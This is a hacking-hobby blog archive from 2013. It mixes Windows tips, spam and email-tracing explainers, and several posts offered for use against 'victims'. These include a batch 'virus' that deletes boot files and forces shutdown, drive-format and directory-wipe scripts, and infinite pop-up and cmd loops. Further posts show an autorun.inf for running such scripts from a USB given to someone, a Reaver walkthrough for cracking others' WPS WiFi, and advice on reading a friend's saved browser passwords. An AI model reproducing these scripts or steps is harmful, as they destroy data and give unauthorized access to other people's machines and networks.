
Wednesday, September 25, 2013

Fast Switch User in Windows

There is a way to change users from the command prompt without logging off Windows.

1) Press Ctrl+Alt+Del to launch Task Manager and look for a process in the list called explorer.exe.
Click the End Process button.
2) Next, click on the file menu and choose New Task (Run…)
3) Enter “cmd” and hit enter to open the Command Prompt window
4) Inside the Command Prompt, use the following syntax:
runas /user:username "explorer"
For example, to switch to the "Administrator" account, use the following command:
runas /user:Administrator "explorer"

Monday, September 9, 2013

Schedule Turn On/Shut Down Computer

To automatically start your computer up at a specific time of day, you'll actually need to edit your BIOS settings.

To do this:

Boot up your computer and enter your BIOS setup. Usually this involves pressing the Delete key as your computer boots (your computer should say Press DEL to Enter Setup or something similar as you turn it on).

Navigate to the Power Options. If your BIOS supports it, there should be a function for automatically starting up your computer at a certain time of day. Mine was called "Resume by Alarm", but yours might be called something different.

Enable that setting and set the time you want your computer to start every day. Save and Exit the BIOS, and your computer should follow that schedule from now on.

You probably shut down your computer when you're done using it at the end of the day, but if not, you can set it to shut itself down on a schedule. This is easy to do with Windows Task Scheduler.

Hit the Start menu and type in "task scheduler". Open up Task Scheduler from your results.
In the right pane, hit Create Task. Give it a name, and under the General tab, check "Run with highest privileges". Also check "Run whether user is logged on or not", if you ever leave your computer logged out.
Head to the Settings tab and check "Stop the task if it runs longer than" and set it to "1 hour". This won't stop your computer from sleeping, but will stop your computer from thinking a task is still running.
Head to the Actions tab, hit New, and choose "Start a Program" as your action. Set the Program to shutdown and the arguments to -s.

Lastly, head to the Triggers tab and click New. Change the schedule to fit whatever you want (say, Daily at 12:00AM), and hit OK. Hit OK again at the next window and your task should be saved in Task Scheduler.

Another easy way to configure it is to schedule a task that runs a shutdown batch command; one can be found on this blog.


That's it.
Now your computer should shut down and wake up on your own schedule.

Monday, August 26, 2013

RunAsDate

Today, let me introduce an application that allows you to run a program at the date and time that you specify.

This utility doesn't change the current system date and time of your computer; it only injects the date/time that you specify into the desired application.

You can run multiple applications simultaneously, each working with a different date and time, while the real date/time of your system continues to run normally.

RunAsDate intercepts the kernel API calls that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime) and replaces the current date/time with the date/time that you specify.




Source: http://www.nirsoft.net/utils/run_as_date.html

Thursday, August 22, 2013

Stored Password from Firefox

This is really amazing: when I was moving through my browser's settings, I found the place where all the passwords are stored.
I was really shocked that it allowed me to have a look at all the usernames and passwords which I had asked my computer to remember, which also included my Internet username and password. But this is only possible in Mozilla Firefox.

To hack your friend's password you need even less than a minute, and you can have a quick look at your friend's usernames and passwords.

Just follow the following steps:

Open Mozilla Firefox
Go to Tools -> Options -> Security -> Saved Passwords button

It will show you a list of websites with the usernames. To get the passwords, click on the Show Passwords button.
Now, to get the Internet password, just look for any IP address in the website column: this is the IP address of that computer, and the username and password are what you want.

Friday, August 9, 2013

Crack WPA/WPA2 with Reaver

WPA/WPA2 has become less secure. Within a matter of hours you can retrieve the WiFi password thanks to a useful tool called Reaver. A team named Tactical Network Solutions found a weakness in WPA that allows an attacker to brute-force the Wi-Fi Protected Setup (WPS) PINs and recover an access point's password within 4-10 hours. The tool we are going to be using with this method is called Reaver. This method may only be used if the WiFi network is using PSK (Pre-Shared Key) as the authentication method.

In this tutorial I will be using Backtrack 5 RC3. You can use any type of modern Linux Distro though.

In order to do this attack, you will require a wireless adapter that can be put into monitor mode. I recommend the Realtek RTL8187. Alfa cards will also do the job and you can find either one of these online for pretty cheap.

Step 1: Open a terminal window and find your wireless adapter.

Type in airmon-ng and this will display the wireless adapters you have connected.
Notice the interface in the screenshot above is "wlan0". I will use this in the next step.

Step 2: Put your Wireless Adapter into monitor mode.

You can do this by typing: airmon-ng start wlan0
(Yours may be different from wlan0; make sure to use the interface from the first step.)
Monitor mode basically lets your wireless adapter monitor all traffic received.
After this is complete, you will see at the bottom: "monitor mode enabled on mon0". This confirms that your wireless adapter has been set to monitor mode.

Step 3: Determine which Access Point to attack.

In this step we will find out the BSSID of the access point you want to attack. This is the unique identifier for the access point.

Type: airodump-ng mon0
This will list all of the access points that are in your area and give their BSSIDs:
For this tutorial, I will be using the top network, "linksys".
Under "Auth" you will see PSK (Pre-Shared Key). This cracking process will only work if the network is using PSK. Take note of the BSSID and the channel number.

Step 4: Let’s get cracking

We will now use Reaver to target the specific BSSID and Channel number to retrieve the password from the router.
The command you will type in is:
reaver -i mon0 -c 6 -b 80:96:B1:AA:A3:92 -vv
The 6 and the 80:96:B1:AA:A3:92 will be different for you of course, depending on the channel and BSSID you are targeting.
-i = The interface you wish to use.
-c = The channel number
-b = The BSSID of the access point.
-vv = Very verbose, it gives detailed information along the way but it is not required.

As you can see, Reaver starts by trying PIN 12345670 against the Pre-Shared Key. It will keep trying PINs until the correct one is found. When it is found, the access point's password will be shown to you!
*This process can take roughly 4-10 hours.



Friday, August 2, 2013

Virus To Crush The Windows

This code will shut down the computer, never to reboot again! Use with care! Copy the following code into notepad:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save as Hackmimic_crushwindows.bat

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Tuesday, June 25, 2013

Toggle Caps Lock

This code will toggle the Caps Lock key continuously... quite annoying >.<

Copy the following code into notepad:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save as Hackmimic_capslock.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Monday, June 24, 2013

Hit Enter Key

This code will send the Enter key continuously to the victim machine. It will stop after the computer restarts.

Copy the following code into notepad:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save as Hackmimic_enter.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Sunday, June 23, 2013

Pop Out CD Drive

This code will eject all the CD drives of your victim; if there is more than one, it ejects all of them.
Quite stupid yet fun... restarting the PC will clear and stop the script.

Copy the following code into notepad:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save as Hackmimic_popout.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Saturday, June 22, 2013

Remove Directory

When executed, this code will delete all directories and files in the specified directory. It works like delete/erase, but instead of one file at a time, the rd command removes the whole directory tree, leaving you a fresh empty folder.

Copy the following code into notepad:

rd J:\ /s /q

Save as Hackmimic_rd.bat

Remove Directory Help

RMDIR [/S] [/Q] [drive:]path
RD [/S] [/Q] [drive:]path

    /S      Removes all directories and files in the specified directory
            in addition to the directory itself.  Used to remove a directory
            tree.

    /Q      Quiet mode, do not ask if ok to remove a directory tree with /S

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Friday, June 21, 2013

Format Drive

The following code will format the defined drive letter in the computer.

Copy the code below into notepad:

format D: /q /x

Save as Hackmimic_format.cmd

Good to go now...

*Replace D with any other drive letter
*You can add multiple lines for different disk drives
*Perform a test on a USB drive to check the result

Format Help

FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X]
FORMAT volume [/V:label] [/Q] [/F:size]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors]
FORMAT volume [/V:label] [/Q]
FORMAT volume [/Q]

  volume          Specifies the drive letter (followed by a colon),
                  mount point, or volume name.
  /FS:filesystem  Specifies the type of the file system (FAT, FAT32, or NTFS).
  /V:label        Specifies the volume label.
  /Q              Performs a quick format.
  /C              NTFS only: Files created on the new volume will be compressed
                  by default.
  /X              Forces the volume to dismount first if necessary.  All opened
                  handles to the volume would no longer be valid.
  /A:size         Overrides the default allocation unit size. Default settings
                  are strongly recommended for general use.
                  NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
                  FAT supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).
                  FAT32 supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).

                  Note that the FAT and FAT32 files systems impose the
                  following restrictions on the number of clusters on a volume:

                  FAT: Number of clusters <= 65526
                  FAT32: 65526 < Number of clusters < 4177918

                  Format will immediately stop processing if it decides that
                  the above requirements cannot be met using the specified
                  cluster size.

                  NTFS compression is not supported for allocation unit sizes
                  above 4096.

  /F:size         Specifies the size of the floppy disk to format (1.44)
  /T:tracks       Specifies the number of tracks per disk side.
  /N:sectors      Specifies the number of sectors per track.

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Metasploit

Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.

Here is a brief table of contents for Singh's book:

Chapter 1: Metasploit Quick Tips for Security Professionals covering: configuration, installation, basic use, and storing results in a database
Chapter 2: Information Gathering and Scanning covering: passive and active gathering, social engineering, scanning, Nessus, NeXpose, and Dradis
Chapter 3: Operating System-based Vulnerability Assessment covering: exploits, Windows XP, remote shells, Windows 2003, Windows 7, Linux, and DLL injection
Chapter 4: Client-side Exploitation and Antivirus bypass covering: IE, Word, Adobe Reader, payloads, and killing anti-virus
Chapter 5: Using Meterpreter to Explore the Compromised Target covering: Meterpreter commands, privilege escalation, communication channels, and snooping on Windows targets
Chapter 6: Advanced Meterpreter Scripting covering: hash dumps, back doors, pivoting, Railgun, and killing firewalls
Chapter 7: Working with Modules for Penetration Testing covering: Auxiliary modules, admin modules, SQL injection, post-exploitation, and creating new modules
Chapter 8: Working with Exploits covering: mixins, msfvenom, going from exploit to Metasploit module, and fuzzing
Chapter 9: Working with Armitage covering: Getting started, information gathering, and targeting multiple machines
Chapter 10: Social Engineering Toolkit covering: Installation, configuration, spear-phishing, website attacks, and infectious media generation.

To summarize, if you are looking for a Metasploit book in cookbook format, then this book would be a good choice.

Metasploit Official Website: http://www.metasploit.com/

Thursday, June 20, 2013

Penetration Test

Penetration testing, in simple words, can be defined as a test performed directly on live networks or servers by attacking them, carried out by a trained ethical hacking professional or a network security administrator.

If you still can't get it, let me make it simpler for you. Consider an organization whose employees work with certain software. It stores all its data in some kind of "database server". What we do is hire an ethical-hacking trained person, and he will directly conduct the test on the possibly vulnerable areas of the system, the network or the software.

Classification of Penetration Testing

Penetration testing is basically classified according to the things that are known to the ethical hackers. It is classified as follows:

- White Box Testing
- Black Box Testing

In white box tests the ethical hacker sees the whole network, its previous data and its updates. That means he knows everything before he performs the testing.

In black box testing ethical hackers carry out a complete attack without knowing even the operating system on the network. So a black box test is a really hard thing to do in ethical hacking.

Wednesday, June 19, 2013

Delete Folder

This code will delete whatever is defined when executed.
Copy the following code into notepad without the quotes:

"erase C:\Program Files\Common Files"

Save as "Hackmimic.cmd"

When executed, the Common Files folder inside Program Files will be permanently deleted.

For Testing

Create a text file in C: drive
Name it as hackmimic.txt
Use "erase C:\hackmimic.txt"

Erase Help

Deletes one or more files.

DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

  names         Specifies a list of one or more files or directories.
                Wildcards may be used to delete multiple files. If a
                directory is specified, all files within the directory
                will be deleted.

  /P            Prompts for confirmation before deleting each file.
  /F            Force deleting of read-only files.
  /S            Delete specified files from all subdirectories.
  /Q            Quiet mode, do not ask if ok to delete on global wildcard
  /A            Selects files to delete based on attributes
  attributes    R  Read-only files            S  System files
                H  Hidden files               A  Files ready for archiving
                -  Prefix meaning not

If Command Extensions are enabled DEL and ERASE change as follows:

The display semantics of the /S switch are reversed in that it shows
you only the files that are deleted, not the ones it could not find.

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Autorun File

Create an autorun file that will execute other files when loaded.

Step by Step Tutorial


  1. Open notepad, type the following code inside.
  2. [AUTORUN]
     open=filename.extension
  3. Save as "autorun.inf"
  4. Finished. Simple, that's it!

So, what can we do with it?
Go back to step 2 and check the filename.extension; usually we put our simple script file there, such as shutdown.bat, format.cmd, etc.
Finally, copy both files onto a USB or CD and pass it to your victim. Watch the result.

Tuesday, June 18, 2013

How Spammers get your Email

Spam is amazing. In an unprecedented and astonishing effort, junk email reaches almost everybody online.
All it takes to get on the mailing lists used by spammers is an email address. There is no need to sign up for anything or ask for emails. The spam just starts coming, out of nowhere, apparently without any plan, and without a reason. It invades email addresses that are never used.

But how do spammers discover email addresses? How do they find your mailbox when your best friend does not?

Dictionary Attack

Big free email providers like Windows Live Hotmail or Yahoo! Mail are a spammer's paradise, at least when it comes to finding spammable addresses.

Millions of users share one common domain name, so you already know that part ("gmail.com" in the case of Gmail). Try to sign up for a new account and you will discover that guessing an existing user name is not difficult either. Most short and good names are taken.

So, to find email addresses at a large ISP, it's enough to combine the domain name with a random user name. Chances are both "ethan1@hotmail.com" and "ethan2@hotmail.com" exist.

To beat this kind of spammer attack, use long and difficult addresses.

Brute Searching Force

Another tactic employed by spammers to discover email addresses is to search common sources for email addresses. They have robots scanning web pages and following links.

These address harvesting bots work a lot like the search engines' robots, only they're not after the page content at all. Strings with '@' somewhere in the middle and a top-level domain at the end are all the spammers are interested in.

While not picky, the pages the spammers are particularly keen to visit are web forums, chat rooms and web-based interfaces to usenet because lots of email addresses are likely to be found there.

This is why you should

  • disguise your email address when you use it on the net or, better yet,
  • use disposable email addresses.

If you post your address on your own web page or blog, you can encode it so that visitors who want to send you an email can see and use it, but spambots cannot. Again, using a disposable address provides a very effective and at the same time convenient alternative.
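An added example (not from the original post) of the encoding recommended above, in Python: the address is written as decimal HTML character references, which a browser renders and follows as a normal mailto link, but the raw page source no longer contains the '@'-plus-TLD string the post says harvesting bots match on. The harvester pattern and the sample pages are constructed for this demonstration, not taken from any real bot.

```python
import html
import re

# The harvester rule the post describes: some characters, an '@', a domain and
# a top-level domain at the end. Constructed for this demonstration.
HARVESTER_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def harvest(page_source):
    """Addresses a naive bot would collect from the raw HTML source."""
    return HARVESTER_RE.findall(page_source)


def encode_address(addr):
    """Write every character of the address as a decimal HTML character reference.

    Browsers decode references in both element text and attribute values, so
    the address displays correctly and works inside href="mailto:...", while
    the raw source contains neither '@' nor a dotted TLD for HARVESTER_RE.
    """
    return "".join(f"&#{ord(ch)};" for ch in addr)


def contact_snippet(addr, link_text="send me an email"):
    """HTML fragment publishing an encoded address both as a link and as text."""
    enc = encode_address(addr)
    return f'<a href="mailto:{enc}">{html.escape(link_text)}</a> ({enc})'


def as_browser_sees(fragment):
    """What the visitor reads after the browser's own entity decoding."""
    return html.unescape(fragment)


# Constructed sample pages: the same contact line, plain and encoded.
PLAIN_PAGE = "<p>Contact: ethan1@example.com</p>"
ENCODED_PAGE = f"<p>Contact: {contact_snippet('ethan1@example.com')}</p>"

if __name__ == "__main__":
    print("harvested from plain page:  ", harvest(PLAIN_PAGE))
    print("harvested from encoded page:", harvest(ENCODED_PAGE))
    print("what a visitor sees:        ", as_browser_sees(ENCODED_PAGE))
```

The caveat in the last assertion of the test, and the reason the post also recommends disposable addresses: a bot that renders the page through an HTML parser decodes the references exactly as a browser does, so encoding only defeats bots that scan raw source.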

Worms Turning Infested PCs Into Spam Zombies

To avoid being detected and filtered, spammers seek to send their emails from a distributed network of computers. Ideally, these computers are not even their own but those of unsuspecting users.

To build such a distributed network of spam zombies, spammers cooperate with virus authors who equip their worms with small programs that can send bulk emails.

Additionally, these spam sending engines will often scan the user's address book, web cache and files for email addresses. That's another chance for spammers to catch your address, and this one is particularly difficult to avoid.

The best anybody can do is

  • keeping their email program updated and patched,
  • being wary of any attachments they did not request and
  • doing virus scans with a free, up to date scanner regularly.

Monday, June 17, 2013

Infinite Loop

This code will continuously show a message on the target machine until the victim manually closes it.
Copy the following code into notepad:
@ECHO off
:BEGIN
msg * Gotcha! Say cheese...
GOTO BEGIN


This code will continuously open command prompt windows, an infinite number of times, irritating the victim and affecting performance.
Copy the following code into notepad:
:x
start cmd.exe

GOTO x

Save as Hackmimic_msg.bat; then you can open the file.

*You can replace the message with anything after the echo tag and a space.
*You can put multiple echo lines as well.
*Search this blog for autorun script and automate it.
Feel free to leave comments~

Thursday, June 13, 2013

ASCII Description & Table

Description

ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as 'a' or '@' or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want 'plain' text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as 'text only'

Table

[ASCII table image not preserved]

Extended ASCII Table

[Extended ASCII table image not preserved]


Wednesday, June 12, 2013

Password Protect Google Chrome

Simple Startup Password is an add-on for the Google Chrome browser that blocks unauthorized people from using your browser. Just go to the extensions gallery of Google Chrome and install the Simple Startup Password add-on for your browser.
After installing the add-on, go to Settings -> Tools -> Extensions. There, look for Simple Startup Password and click on Options. Set a password for your browser and you are done. Now every time you start your Google Chrome browser it will ask you for the password, and if you fail to give the correct password your browser will be closed.

You can get this add-on from Google Chrome's extensions gallery.
Link: Simple Startup Password for Google Chrome

In case you forget your password there is no option to recover it. You will have to re-install the browser.

Trace Email

While sending or receiving an email, our browser uses two protocols:
SMTP (Simple Mail Transfer Protocol), port 25
POP (Post Office Protocol), port 110

Whenever you click on the send button of your browser to send a mail, the mail first reaches the source mail server; from there it goes to the interim mail servers, from there it moves to the destination mail server and at last to the destination inbox. So as you see it's not a complicated process, and it can be described by the following diagram: |Sender Outbox-----> Source Mail Server-----> Interim Mail Servers-----> Destination Mail Server------> Destination Inbox|

Emails do not travel alone: they carry an email header with them.
This email header reveals the path taken by the email to reach its destination.

Tracing Time:

Here I will take a real-life example of an email that was sent to me.
The email header is:

From John Wed Jun 12 20:36:53 2013

X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530

Return-Path: <dt_biz@terenciri.com>

X-YahooFilteredBulk: 209.124.87.14

X-Originating-IP: [209.124.87.14]

Received: from 209.124.87.14  (HELO org.pickepair.com) (209.124.87.14)

by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530

From: John <DT_Biz@terenciri.com>

Subject:Stop paying for CDs.
To: divya_football@yahoo.co.in

Date: Wed, 12 Jun 2013 11:06:53 EDT

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"


Before tracing, the first thing is to divide the header into chunks of 3-4 lines, and then I will explain each line.
So let's begin:
Date: Wed, 12 Jun 2013 11:06:53 EDT

From: John <DT_Biz@terenciri.com>

To: divya_football@yahoo.co.in

Subject:Stop paying for CDs.

Date: Wed, 12 Jun 2013 11:06:53 EDT

This line tells us the date on which the mail was sent to me.
From: John <DT_Biz@terenciri.com>

This line tells me the email address of the person who sent the mail.
To: divya_football@yahoo.co.in
This line tells us to whom the mail was sent; in this case it is my email.
Subject:Stop paying for CDs.
This line tells us the subject of the message.

X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530

Return-Path: <dt_biz@terenciri.com>

X-YahooFilteredBulk: 209.124.87.14


X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530

This line tells me that the message was sent to my email via 203.104.17.163 on Wednesday, 12th June 2013.
Return-Path: <dt_biz@terenciri.com>

Again, this line tells me the email address of the person who sent me this mail.
X-YahooFilteredBulk: 209.124.87.14

This line tells me that the message was filtered by 209.124.87.14
X-Originating-IP: [209.124.87.14]

This line tells me the IP address of the person who sent me this email.
Received: from 209.124.87.14  (HELO org.pickepair.com) (209.124.87.14)

by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530

Again, this line tells us the IP address of the person who sent this mail, and it contains some SMTP commands which you will learn about in the next lesson.

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

MIME-Version: 1.0
This line tells me the software that the attacker used to send me the message.
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
This line tells me the type of text the email used.
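As an added example, not part of the original post, here is a Python script that parses the header quoted above and separates the fields the recipient's own mail server wrote from the fields the sender controls: From, Return-Path and X-Originating-IP are whatever the sender chose to put there, while the Received line stamped by the provider records the IP address that actually connected to it. The script assumes (my assumption, not the post's) that relays under .yahoo.com are the recipient's provider, so only Received lines they added are trusted; the header text is re-assembled from the lines shown above, with the folded "by ..." continuation re-attached.

```python
"""Walk the Received chain of the header discussed above and mark what is trustworthy."""
import re
from email import message_from_string
from ipaddress import ip_address

# Header fields from the post. The "by ..." line is a folded continuation
# (RFC 5322: a continuation line starts with whitespace). The envelope line
# "From John Wed Jun 12 ..." is omitted because it is not a header field.
RAW_HEADER = """\
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
Return-Path: <dt_biz@terenciri.com>
X-YahooFilteredBulk: 209.124.87.14
X-Originating-IP: [209.124.87.14]
Received: from 209.124.87.14  (HELO org.pickepair.com) (209.124.87.14)
 by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
From: John <DT_Biz@terenciri.com>
Subject:Stop paying for CDs.
To: divya_football@yahoo.co.in
Date: Wed, 12 Jun 2013 11:06:53 EDT
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

"""

# Assumption: the recipient's own provider runs the relays under this suffix.
# Only Received lines they stamped are under our control; every line below
# them in the chain was handed to us by the sender and can be forged.
TRUSTED_BY_SUFFIX = ".yahoo.com"

RECEIVED_RE = re.compile(
    r"from\s+(?P<from>\S+)"                 # name/IP the relay logged for its client
    r"(?:\s+\(HELO\s+(?P<helo>[^)]+)\))?"   # HELO/EHLO name the client announced
    r"(?:\s+\((?P<ip>[\d.]+)\))?"           # connecting IP the relay observed
    r"\s+by\s+(?P<by>\S+)",                 # the relay that wrote this line
    re.IGNORECASE,
)


def parse_received(value):
    """Return dict(from, helo, ip, by, date) for one Received header, or None."""
    flat = " ".join(value.split())  # unfold and squeeze whitespace
    m = RECEIVED_RE.search(flat)
    if not m:
        return None
    hop = m.groupdict()
    hop["date"] = flat.rsplit(";", 1)[1].strip() if ";" in flat else None
    return hop


def _is_private(ip):
    try:
        return ip_address(ip).is_private
    except ValueError:  # a hostname rather than an address literal
        return None


def trace(raw, trusted_by_suffix=TRUSTED_BY_SUFFIX):
    """Parse a raw header block and decide which IP can actually be relied on."""
    msg = message_from_string(raw)
    # Each relay prepends its own Received line, so index 0 is the last hop
    # (closest to us) and the final element is the earliest one.
    hops = [h for h in map(parse_received, msg.get_all("Received", [])) if h]

    connecting_ip = None
    for hop in hops:
        if hop["by"] and hop["by"].lower().endswith(trusted_by_suffix):
            connecting_ip = hop["ip"] or hop["from"]
            break  # first trusted stamp from the top: the peer that really connected

    x_orig = (msg.get("X-Originating-IP") or "").strip("[] ")
    first = hops[0] if hops else None
    return {
        "claimed_from": msg.get("From"),          # sender-asserted, not verified
        "return_path": msg.get("Return-Path"),    # sender-asserted, not verified
        "hops": hops,
        "connecting_ip": connecting_ip,
        "x_originating_ip": x_orig or None,
        # A sender-asserted field can corroborate the trusted hop, never replace it.
        "x_originating_matches": bool(connecting_ip) and x_orig == connecting_ip,
        "connecting_ip_is_private": _is_private(connecting_ip) if connecting_ip else None,
        # The HELO name is whatever the client typed; flag it when it differs
        # from what the relay itself logged so nobody takes it at face value.
        "helo_unverified": bool(first and first["helo"] and first["helo"] != first["from"]),
    }


if __name__ == "__main__":
    for key, value in trace(RAW_HEADER).items():
        print(f"{key}: {value}")
```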
The header can be viewed by going to Actions in Yahoo Mail; in Gmail it is found in the settings. If you use some other website, the best way is to find it using Google. Now, if you have got the IP address, what can you do?

The answer is very simple: you can just do a whois scan for that IP address.
Whois is a tool that has information about all the hosts. When I did a whois scan for the above IP address it revealed the following information:

Whois IP 209.124.87.14

# start

NetRange:       209.124.64.0 - 209.124.95.255
CIDR:           209.124.64.0/19
OriginAS:       
NetName:        DRAGON-BLK-1
NetHandle:      NET-209-124-64-0-1
Parent:         NET-209-0-0-0-0
NetType:        Direct Allocation
Comment:        ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:        1999-04-20
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-209-124-64-0-1

OrgName:        Dragon Networks, Inc.
OrgId:          DRAGON-8
Address:        93, Moor Lane
City:           Wilmslow
StateProv:      Cheshire
PostalCode:     SK9 6BR
Country:        GB
RegDate:        2002-05-19
Updated:        2012-06-21
Ref:            http://whois.arin.net/rest/org/DRAGON-8

OrgAbuseHandle: ABUSE1150-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1 404.300.9889 
OrgAbuseEmail:  email@dragonnetwurx.com
OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE1150-ARIN

OrgNOCHandle: CTS4-ARIN
OrgNOCName:   Smith, Charles T
OrgNOCPhone:  +1 404-949-7884 
OrgNOCEmail:  email@dragonnetwurx.com
OrgNOCRef:    http://whois.arin.net/rest/poc/CTS4-ARIN

OrgTechHandle: ABUSE1150-ARIN
OrgTechName:   Abuse
OrgTechPhone:  +1 404.300.9889 
OrgTechEmail:  email@dragonnetwurx.com
OrgTechRef:    http://whois.arin.net/rest/poc/ABUSE1150-ARIN

# end


# start

NetRange:       209.124.87.0 - 209.124.87.15
CIDR:           209.124.87.0/28
OriginAS:       AS22653
NetName:        NET-209-124-87-0-1
NetHandle:      NET-209-124-87-0-1
Parent:         NET-209-124-64-0-1
NetType:        Reassigned
RegDate:        2013-04-26
Updated:        2013-04-26
Ref:            http://whois.arin.net/rest/net/NET-209-124-87-0-1

OrgName:        J. Eaton
OrgId:          JE-98
Address:        PO Box 3109 # 22016
City:           Houston
StateProv:      TX
PostalCode:     77253-3109
Country:        US
RegDate:        2013-04-26
Updated:        2013-04-26
Ref:            http://whois.arin.net/rest/org/JE-98

OrgAbuseHandle: ADMIN4210-ARIN
OrgAbuseName:   Administrator
OrgAbusePhone:  +1-760-683-4974 
OrgAbuseEmail:  email@gmail.com
OrgAbuseRef:    http://whois.arin.net/rest/poc/ADMIN4210-ARIN

OrgTechHandle: ADMIN4210-ARIN
OrgTechName:   Administrator
OrgTechPhone:  +1-760-683-4974 
OrgTechEmail:  email@gmail.com
OrgTechRef:    http://whois.arin.net/rest/poc/ADMIN4210-ARIN

# end




iMacros

iMacros is an extension for the Mozilla Firefox, Google Chrome, and Internet Explorer web browsers which adds record and replay functionality similar to that found in web testing and form filler software. The macros can be combined and controlled via JavaScript. Demo macros and JavaScript code examples are included with the software. iMacros was developed by iOpus. First released in 2001, iMacros was the first macro recorder tool specifically designed and optimized for web browsers and form filling.
iMacros for Firefox and Chrome offers a feature known as social scripting. It allows users to share macros and scripts in a way that is similar to how they share bookmarks on the many social bookmarking websites. After creating a new macro, users can click just once to share it with their friends as a link, either by distributing the link via email and social bookmarking websites, or by embedding it in a website or blog for public access. Technically, this is accomplished by embedding the imacro and the controlling JavaScript inside a plain text link.

Along with the freeware version, iMacros is available as a proprietary commercial application, with additional features and support for web scripting, web scraping, internet server monitoring, and web testing. In addition to working with HTML pages, the commercial editions can automate Adobe Flash, Adobe Flex, Silverlight, and Java applets by using Directscreen and image recognition technology.
Advanced versions also contain a command-line interface and an application programming interface (API) to automate more complicated tasks and integrate with other programs or scripts. The iMacros API is called Scripting Interface. The Scripting Interface of the iMacros Scripting Edition is designed as a Component Object Model (COM) object and allows the user to remotely control (script) the iMacros Browser, Internet Explorer, and Firefox from any Windows programming or scripting language.

Friday, June 7, 2013

Track Down a Hacker

Sometimes, it's just not enough to simply know that there's a Trojan or Virus onboard. Sometimes you need to know exactly why that file is on-board, how it got there - but most importantly, who put it there.
By enumerating the attacker in the same way that they have enumerated the victim, you will be able to see the bigger picture and establish what you're up against.

Connections make the world go round

The computer world, at any rate. Every single time you open up a website, send an email or upload your webpages into cyberspace, you are connecting to another machine in order to get the job done. This, of course, presents a major problem, because this simple act is what allows malicious users to target a machine in the first place. 

How do these people find their victim?
Well, first of all, they need to get hold of the victim's IP Address. Your IP (Internet Protocol) address reveals your point of entry to the Internet and can be used in many ways to cause your online activities many, many problems. It may not reveal you by name, but it may be uniquely identifiable and it represents your digital ID while you are online (especially so if you're on a fixed IP / DSL etc). 

With an IP address, a Hacker can find out all sorts of weird and wonderful things about their victim (as well as causing all kinds of other trouble, the biggest two being Portnukes/Trojans and the dreaded DoS (Denial of Service) attack). Some Hackers like to collect IP Addresses like badges, and like to go back to old targets, messing them around every so often. An IP address is incredibly easy to obtain: until recently, many real-time chat applications (such as MSN) were goldmines of information. Your IP Address is contained as part of the Header Code on all emails that you send, and webpages that you visit can store all kinds of information about you.

